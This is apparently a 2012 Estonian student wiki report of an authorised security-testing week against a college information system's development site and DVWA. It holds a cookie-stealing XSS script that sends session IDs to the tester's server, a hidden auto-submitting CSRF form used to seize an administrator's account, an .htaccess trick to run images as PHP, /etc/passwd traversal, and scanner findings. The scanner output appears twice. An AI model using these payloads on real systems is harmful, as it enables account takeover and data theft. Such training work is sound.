The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T20:47:34Z

Ulihten: /* 1. päev - Materjalidega tutvumine */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===
==Väike upload tegevus, mis võiks olla teisiti==
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

